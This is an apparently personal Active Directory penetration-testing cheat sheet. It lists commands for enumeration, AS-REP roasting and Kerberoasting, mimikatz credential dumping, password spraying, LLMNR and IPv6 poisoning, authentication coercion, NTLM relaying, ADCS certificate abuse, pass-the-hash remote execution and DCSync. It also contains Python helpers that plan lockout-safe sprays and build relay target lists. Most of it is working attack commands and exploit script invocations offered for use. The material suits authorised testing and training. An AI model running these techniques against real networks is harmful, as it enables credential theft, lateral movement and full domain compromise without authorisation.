AD mindmap - https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
python3 -m pipx install impacket
- Tools that import impacket as a library (like PetitPotam) will fail under a pipx install, since impacket isn't exposed as a pip library. For those, use a venv: python3 -m venv pipenv, source pipenv/bin/activate, and pip install impacket

Enum4Linux-ng
enum4linux-ng {IP}
- -U for user enum, -O for OS info (lowercase -o is the output file), -S for shares, -L for additional domain info (on DCs), -P for password policy info, -I for printer info
enum4linux-ng -u {username} -p {password} -w {domain} {target_IP}
- -K {ticket_file} to auth using a Kerberos ticket (DNS must be set up)
- -H {NTHASH} to pass a hash
- --local-auth for local authentication

PingCastle
wget https://github.com/netwrix/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zip
Pingcastle.exe --healthcheck --server {domain} from the Windows side

NTLMRecon
ntlmrecon --input {IP_or_cidr_or_file} --outfile ntlmrecon.csv

SMB
nxc smb {IP} -u '{domain}\{username}' -p {password}
- --shares for share enumeration, --rid-brute 3000 or --users for user enum, --pass-pol for password policy
- --reg-sessions was a recent addition to query user sessions on a machine (via the remote registry)
- -M for modules, like exploits and such
- -X 'powershell -e ...' to run a PowerShell command (-x runs a cmd command instead)
smbclient.py {ip} for an interactive SMB client
- shares lists shares; select one with use {share_name}; tree recursively lists files in the share
- Look in policies/{guid}/machine/preferences/groups (Groups.xml in SYSVOL) for a Group Policy Preferences password (cpassword)
- gpp-decrypt decrypts the cpassword value (the AES key is public)
- tr -d '\000' < input_file > output_file strips null bytes, e.g. from UTF-16 files pulled off a Windows share, so grep works on them
- -k for Kerberos auth: smbclient.py {FQDN} -k
mount -t cifs //{IP}/{share} /mnt/{created_dir} to mount a share locally
- -o username={username},password={password} for credentials

LDAP
ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={TLD}" for an anonymous bind
ldapsearch -D '{user}@{user_domain}' -w '{user_password}' -H ldap://{IP} -b "dc={target_domain},dc={tld}" with credentials
ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={tld}" "(objectClass=person)" for user objects only
- More Hacktricks info
- Pipe the output through | grep -iE "pass|pwd|secret|cred|auth|token|key" to hunt for secrets in attributes such as description
- -b "dc={target_domain},dc={tld}" -s sub "*" | grep lockoutThreshold for the lockout policy
ldapsearch -x -H ldap://{dc_ip} -D '{owned_username}@{domain}' -W -b "DC={domain},DC={tld}" "(sAMAccountName={target})" to look at one specific account
- userAccountControl: 66050 in the output means the account is disabled (0x10202 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | ACCOUNTDISABLE)
- If we have permissions over the user, we can reenable their account with ldapmodify by setting userAccountControl to 66048 (the same flags with the ACCOUNTDISABLE bit cleared):
ldapmodify -x -H ldap://{dc_ip} -D "{owned_username}@{domain}" -W << EOF
dn: CN={target_name_from_ldapsearch},CN=Users,DC={domain},DC={tld}
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF
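As an added example (not part of the original notes), the following Python decodes a userAccountControl value pulled from ldapsearch output, computes the value that re-enables the account by clearing only ACCOUNTDISABLE rather than hard-coding 66048, and flags the bits a pentester cares about (no preauth required, unconstrained delegation). The bit values are the documented userAccountControl flags; the LDIF sample, the distinguished name and the triage tag names are constructed for the example.

```python
import re

# Documented userAccountControl bits (value -> flag name).
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}

# Bits worth acting on during an engagement; tag names are our own (constructed).
TRIAGE = {
    0x0002: "disabled",
    0x0020: "password_not_required",
    0x80000: "unconstrained_delegation",
    0x400000: "asrep_roastable",
    0x1000000: "constrained_delegation_protocol_transition",
}

# Constructed ldapsearch (LDIF) output for a disabled user.
SAMPLE_LDIF = """\
# target, Users, corp.local
dn: CN=target,CN=Users,DC=corp,DC=local
objectClass: user
sAMAccountName: target
userAccountControl: 66050
"""


def parse_uac(ldif_text):
    """Pull the integer userAccountControl attribute out of ldapsearch output."""
    m = re.search(r"^userAccountControl:\s*(\d+)\s*$", ldif_text, re.M)
    if not m:
        raise ValueError("no userAccountControl attribute in output")
    return int(m.group(1))


def decode_uac(value):
    """Flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def triage(value):
    """Attacker-relevant conditions implied by the value."""
    return [tag for bit, tag in sorted(TRIAGE.items()) if value & bit]


def enable_value(value):
    """Same flags with ACCOUNTDISABLE cleared; 66050 -> 66048."""
    return value & ~0x0002


def ldapmodify_ldif(dn, value):
    """The LDIF that ldapmodify needs to write the new userAccountControl."""
    return "\n".join([
        f"dn: {dn}",
        "changetype: modify",
        "replace: userAccountControl",
        f"userAccountControl: {value}",
        "",
    ])


if __name__ == "__main__":
    uac = parse_uac(SAMPLE_LDIF)
    print(uac, decode_uac(uac), triage(uac))
    print(ldapmodify_ldif("CN=target,CN=Users,DC=corp,DC=local", enable_value(uac)))
```

Clearing the bit instead of writing a fixed 66048 matters when the account carries other flags (for example DONT_REQ_PREAUTH); a fixed value would silently drop them and change the account's behaviour.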
sudo ldapdomaindump ldaps://{IP} -u '{domain}\{username}' -p '{password}' to dump the domain to HTML/JSON
- Try * for the username or password where a login passes them unescaped into an LDAP filter; the wildcard matches any user account, allowing us to log in as one

RPC
rpcclient -U '{domain}/{username}' {IP}
- enumdomusers gets the domain users from within RPC, which we can then check for preauth (AS-REP roasting)
- queryuser {username} to get user properties (passwords could be in descriptions)
- querydispinfo lists users with their descriptions; enum4linux-ng will check for this, among much else
rpcclient -U "" {IP} -N for a null session

Exchange
ntlmrecon --input https://{exchange_endpoint}
proxyshell_rce.py -u https://{exchange_endpoint} -e administrator@{domain} from an unauthed perspective
poc_aug3.py {IP} {username} {password} {command}
Capturing the system data with SharpHound:
Invoke-WebRequest {url} -OutFile {outfile}; Expand-Archive {outfile}
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory {dir} -OutputPrefix {filename_prefix}
apt install bloodhound - installs latest BloodHound CE GUI
bloodhound to launch it
pipx install bloodhound-ce - installs latest bloodhound-ce-python
bloodhound-ce-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -c all --zip -op {out_prefix} -ns {dc_ns_ip}
nxc ldap {dc} -u {username} -p {password} --bloodhound --collection All --dns-server {dns_server_ip} to collect with nxc instead
pipx install bloodhound for the legacy collector
bloodhound-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -c all --zip -op {out_prefix}
Ensuring all data collection
- For a trusted (foreign) domain, point the -d and -dc flags at the target domain, while specifying the domain of the user we own in -u
bloodhound-ce-python -u {user}@{source_domain} -p {password} (--hashes :{NT_HASH}) -d {target_domain} -dc {target_domain_server_name} -c all --zip -op {out_prefix}

Analyzing the data with BloodHound
sudo neo4j start
- If neo4j isn't found, run neo4j and install the suggested package
bloodhound
MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
./cypher-shell -u neo4j -p {password} 'MATCH (c:Computer) WHERE toLower(c.name) ENDS WITH ".example.domain.tld" RETURN c.name' --format plain | tee hostnames.txt to export the hostnames straight from the database

Cached Credentials
privilege::debug gives us the SeDebugPrivilege to run the commands below
token::elevate to elevate to SYSTEM
lsadump::sam will dump NTLM hashes of local users
sekurlsa::logonpasswords will look for clear-text passwords, dump NTLM hashes (including domain users), and dump Kerberos tickets
sekurlsa::tickets will show tickets stored in memory
- For certificates whose private keys are marked non-exportable, crypto::capi and crypto::cng can take care of that (they patch CAPI/CNG so the keys can be exported)

Password Spraying
net accounts will show authentication lockout information (check the lockout threshold and observation window before spraying)
.\Spray-Passwords.ps1 -Pass Nexus123! -Admins
nxc smb {IP_with_smb} -u users.txt -p passwords.txt -d {domain} --continue-on-success
- With both a user file and a password file, nxc tries every combination; add --no-bruteforce to pair the files line by line and keep the attempt count per user under the lockout threshold
nxc smb {IP} -u {users.txt} -H {hashes.txt}
.\kerbrute_windows_amd64.exe passwordspray -d {domain} .\usernames.txt "{password}"
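As an added example (not part of the original notes), this Python parses the lockout policy out of net accounts output and splits a password list into spray batches that stay under the lockout threshold, generating the nxc command for each password. The net accounts text, target, domain and password list are constructed for the example; the batching rule (threshold minus a safety margin attempts per account per observation window, then wait the window out after the last attempt) is the standard spraying precaution, not something from the original page.

```python
import re
import shlex
from dataclasses import dataclass

# Constructed `net accounts` output from a domain-joined host.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""


@dataclass
class LockoutPolicy:
    threshold: int            # 0 means "Never", i.e. no lockout configured
    observation_minutes: int  # badPwdCount resets this long after the last failure


def _field(text, label):
    m = re.search(r"^" + re.escape(label) + r":\s*(\S+)", text, re.M)
    return m.group(1) if m else None


def parse_net_accounts(text):
    """Extract the lockout threshold and observation window."""
    raw = _field(text, "Lockout threshold")
    if raw is None:
        raise ValueError("no lockout threshold in output")
    threshold = 0 if raw.lower() == "never" else int(raw)
    window = _field(text, "Lockout observation window (minutes)")
    return LockoutPolicy(threshold, int(window) if window and window.isdigit() else 0)


def plan_spray(passwords, policy, safety_margin=1):
    """Split passwords into batches. Each password is one round against every
    user, so a batch holds at most threshold - safety_margin rounds. Wait
    policy.observation_minutes after the LAST attempt of a batch before starting
    the next so every account's badPwdCount has reset."""
    pw = list(passwords)
    if policy.threshold == 0:
        return [pw]
    per_batch = policy.threshold - safety_margin
    if per_batch < 1:
        raise ValueError("threshold too low to spray without locking accounts")
    return [pw[i:i + per_batch] for i in range(0, len(pw), per_batch)]


def batch_commands(batch, target, domain, users_file="users.txt"):
    """One nxc spray command per password; single-password -p avoids the
    every-combination behaviour of passing two files."""
    return [
        f"nxc smb {target} -u {users_file} -p {shlex.quote(p)} -d {domain} --continue-on-success"
        for p in batch
    ]


if __name__ == "__main__":
    policy = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    candidates = ["Summer2024!", "Winter2024!", "Welcome1", "Password1",
                  "Nexus123!", "Spring2024!", "Autumn2024!"]
    for n, batch in enumerate(plan_spray(candidates, policy), 1):
        print(f"# batch {n}; after it, wait {policy.observation_minutes} min")
        print("\n".join(batch_commands(batch, "10.10.10.21", "corp.local")))
```

The observation window is measured from the last bad attempt on each account, so the wait has to start when the batch finishes, not when it starts; an account that already has failed attempts from real users will lock earlier than the plan assumes, which is what the safety margin is for.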
impacket-GetNPUsers on kali side
impacket-GetNPUsers -dc-ip {dc} -request -outputfile hashes.asreproast {domain}/{username} (alongside password)
impacket-GetNPUsers {domain}/ -no-pass -usersfile users.txt -dc-ip {IP} | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN' to test a user list without creds (the grep drops users that don't exist)
Rubeus on Windows side
.\Rubeus.exe asreproast /nowrap
impacket-GetNPUsers -dc-ip {IP} {domain}/
CVE-2022-33679.py {domain}/{user} {target_IP} against a user without preauth, abusing the RC4-MD4 downgrade to obtain a TGT without cracking anything

Kerberoasting
impacket-GetUserSPNs if remote with creds
impacket-GetUserSPNs {domain}/{user}:{password} -dc-ip {IP} -request
- If Kerberos complains about clock skew, timedatectl set-ntp off and rdate -n {dc_ip} to sync with the DC
Rubeus again if local
.\Rubeus.exe kerberoast /outfile:hash.txt

Silver Tickets
sekurlsa::logonpasswords on a machine with an established session with the application (usually(?) the current machine) to get the service account's NTLM hash
whoami /user minus the last number (the user RID) gives the domain SID
- Alternatively, wmic useraccount where name='{account_name}' get sid
mimikatz
kerberos::golden /sid:{sid} /domain:{domain} /ptt /target:{server_name} /service:{service_protocol_like_http} /rc4:{NTLM_hash} /user:{any_domain_user}
- /ptt injects the forged ticket into our current logon session, so it is presented to the target service without touching disk
iwr -UseDefaultCredentials {protocol}://{server_name} to view a webserver with the injected ticket

Poisoning
sudo responder -I {network_interface} to respond to LLMNR/NBT-NS/mDNS name queries and host servers to capture the authentication sent
- When relaying instead of capturing, turn the SMB and HTTP servers off in /etc/responder/Responder.conf, as we no longer want to be the server receiving the auth
mitm6 hands out an IPv6 DNS server via DHCPv6 and responds to these requests; it can work with ntlmrelayx
- Use the -6 option with ntlmrelayx so it will listen for IPv6
mitm6 -d {domain}
Coercing
nxc smb {IP} -M coerce_plus -o LISTENER={kali_IP}
- Authenticated with -u {domain}\{user} and -p {password}
- EfsRpcOpenFileRaw (PetitPotam) convinces the DC to open a file at \\attacker_share\share, thus causing the DC's machine account to authenticate to us
- We can capture that with smbserver and try to crack it, but this is pretty unlikely to work due to the randomized machine account passwords
smbserver.py loot $(pwd) -smb2support will host a share on our IP called loot
- ntlmrelayx or certipy can relay the coerced authentication instead of capturing it
- -u {user} -p {password} -d {domain} can be used for authenticated coercion
sudo apt install coercer
coercer coerce -u {domain_user} -p {password} -d {domain} -t {coercion_target_domain_IP} -l {listener_IP} --always-continue
- -l is the server we own

Relaying
ntlmrelayx
ntlmrelayx.py -t {protocol_like_ldaps}://{target_ip} -socks
smb can be used against servers that don't have signing:
ntlmrelayx.py -tf {smb_no_signing_ips} -socks
- -socks will create a socks proxy to forward traffic along using the captured authentication
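As an added example (not part of the original notes), this Python builds the ntlmrelayx -tf target file from nxc smb scan output, keeping only hosts that report signing:False. nxc's own --gen-relay-list does this too; the parser shows what that list is derived from and adds an exclude list so you can drop hosts you must not relay to, such as the machine whose authentication you are coercing (SMB reflection back to the originating host is blocked). The nxc lines, hostnames and addresses are constructed for the example.

```python
import re

# Constructed `nxc smb 10.10.10.0/24` output. signing:True means the server
# requires SMB signing, so a relayed session would be rejected there.
SAMPLE_NXC = """\
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.21     445    FILES01          [*] Windows Server 2016 Build 14393 x64 (name:FILES01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.22     445    WS01             [*] Windows 10 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.23     445    WS02             [*] Windows 10 Build 19041 x64 (name:WS02) (domain:corp.local) (signing:True) (SMBv1:False)
"""

LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+445\s+(?P<host>\S+).*"
    r"\(signing:(?P<signing>True|False)\)"
)


def relay_targets(nxc_output, exclude=()):
    """IPs of hosts that do not require SMB signing, minus any excluded
    IP or hostname (e.g. the coerced source, which cannot be relayed to itself)."""
    targets = []
    for line in nxc_output.splitlines():
        m = LINE_RE.search(line)
        if not m or m.group("signing") == "True":
            continue
        if m.group("ip") in exclude or m.group("host") in exclude:
            continue
        targets.append(m.group("ip"))
    return targets


def target_file_text(targets):
    """Contents for `ntlmrelayx.py -tf targets.txt`, one smb:// URL per line."""
    return "".join(f"smb://{t}\n" for t in targets)


if __name__ == "__main__":
    hosts = relay_targets(SAMPLE_NXC, exclude=("DC01",))
    with open("targets.txt", "w") as f:
        f.write(target_file_text(hosts))
    print(f"wrote {len(hosts)} relay targets:", hosts)
```

Run the real scan with nxc smb {range} and feed its output to relay_targets; then ntlmrelayx.py -tf targets.txt -socks -smb2support uses every host in the file.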
- Add socks4 127.0.0.1 1080 to /etc/proxychains4.conf and then run commands through proxychains as though we had a session as the user
- e.g. proxychains secretsdump.py -no-pass {domain}/{user}@{target}, using -no-pass where normally a password would need to be specified
- -c "{command}" will execute a command as the user, whereas --interactive can drop us into a shell on the respective protocol (SMB/LDAP/SQL); connect to it with nc to the local port ntlmrelayx prints
- --remove-mic with LDAP to downgrade NTLM's Message Integrity Check (aka to relay SMB auth to an LDAP port; CVE-2019-1040, patched DCs reject it)
- -6 for listening for IPv6 with mitm6
- --keep-relaying will continue to relay to all targets even if we've already tried one hash on them
- --add-computer {name} {password} will attempt to add a new computer via SMB/LDAP
- --delegate-access will configure the relayed target computer to allow delegation from the computer specified (or the one just added), i.e. resource-based constrained delegation
krbrelayx.py
- If a host has unconstrained delegation, we can use this to pivot
pretender -i "{network_interface}" --spoof "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" --no-dhcp-dns --no-timestamps
coercer coerce -t BRAAVOS.ESSOS.LOCAL -l localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -u {domain_user} -p {password} -d {domain}
ntlmrelayx.py -t BRAAVOS.ESSOS.LOCAL -smb2support
ntlmrelayx.py -t winrms://BRAAVOS.ESSOS.LOCAL -smb2support
- For the DNS record route, pip install . inside a venv (for dnstool.py), then python3 dnstool.py -u '{domain}\{user}' -p {password} {target_ip} -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d {kali_IP}
wmiexec.py -hashes :{hash} '{domain}/{user}@{ip}'
psexec.py -hashes :{hash} '{domain}/{user}@{ip}' or smbexec.py
atexec.py -hashes :{hash} '{domain}/{user}@{ip}' "{command}"
xfreerdp3 /u:{user} /p:{password} /d:{domain} (/pth:{hash}) /v:{IP}
- /drive:{created_drive_name},/home/kali/Downloads to share a local folder into the session
${variable} | Out-GridView
evil-winrm -i {IP} -u '{domain}\{username}' -H {hash}
- -r {domain} optional, used for Kerberos
Certify.exe find /vulnerable
certipy find -u {user}@{domain} -p {password} (-hashes {nthash}) -dc-ip {dc_ip} -text
- -vulnerable to cut the output down a bit
- Look for a template with Enabled True and Client Authentication True
python PetitPotam.py {kali_IP} {coercable_DC_IP} to get a different DC to authenticate to us
ntlmrelayx.py -t http://{target_DC_IP}/certsrv/certfnsh.asp -smb2support --adcs --template '{vuln_template_name}' to relay the auth to the target's web enrollment endpoint (ESC8)
- --template just specifies the template name we're using from the vulnerable CA
certipy account -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -user '{user_to_check}' -upn '{upn_to_update_to}' update
certipy shadow -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -account '{target_user}' auto
certipy req -k -dc-ip {dc_ip} -target '{DC_fqdn}' -ca '{CA_name_from_certipy}' -template 'User'
- Get a TGT first with getTGT.py '{domain}/{user}:{password}' -dc-ip {dc_ip} and export KRB5CCNAME for -k
certipy auth -pfx '{pfx_file}' -dc-ip '{dc_ip}' -domain '{domain}'
- -ldap-shell for an LDAP shell instead
- A template without Client Authentication in its EKUs (Extended Key Usage), such as a Webserver template, can't be used to authenticate

Recon
sccmhunter.py find -u {username} -p {password} -d {domain} -dc-ip {dc_ip} -debug
nxc smb on the sccm server: nxc smb {sccm_ip} -u {username} -p {password} -d {domain} --shares
pxethief.py 2 {sccm_ip} can also yield results

Exploitation
Group3r is a good tool to auto-enum group policy misconfigs
Abusing Domain Controller Synchronization
- If we have WriteDACL on the domain via a group, we can give ourselves the necessary permissions (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All)
mimikatz on domain-joined machine
lsadump::dcsync /user:{domain}\{user}
impacket-secretsdump on kali
impacket-secretsdump -just-dc-user {target_domain_user} {domain}/{admin_username}:"{password}"@{DC_IP}
impacket-secretsdump -hashes :{NTLM_hash} {domain}/{user}@{DC_IP} to do the same with a hash

UAC Fatigue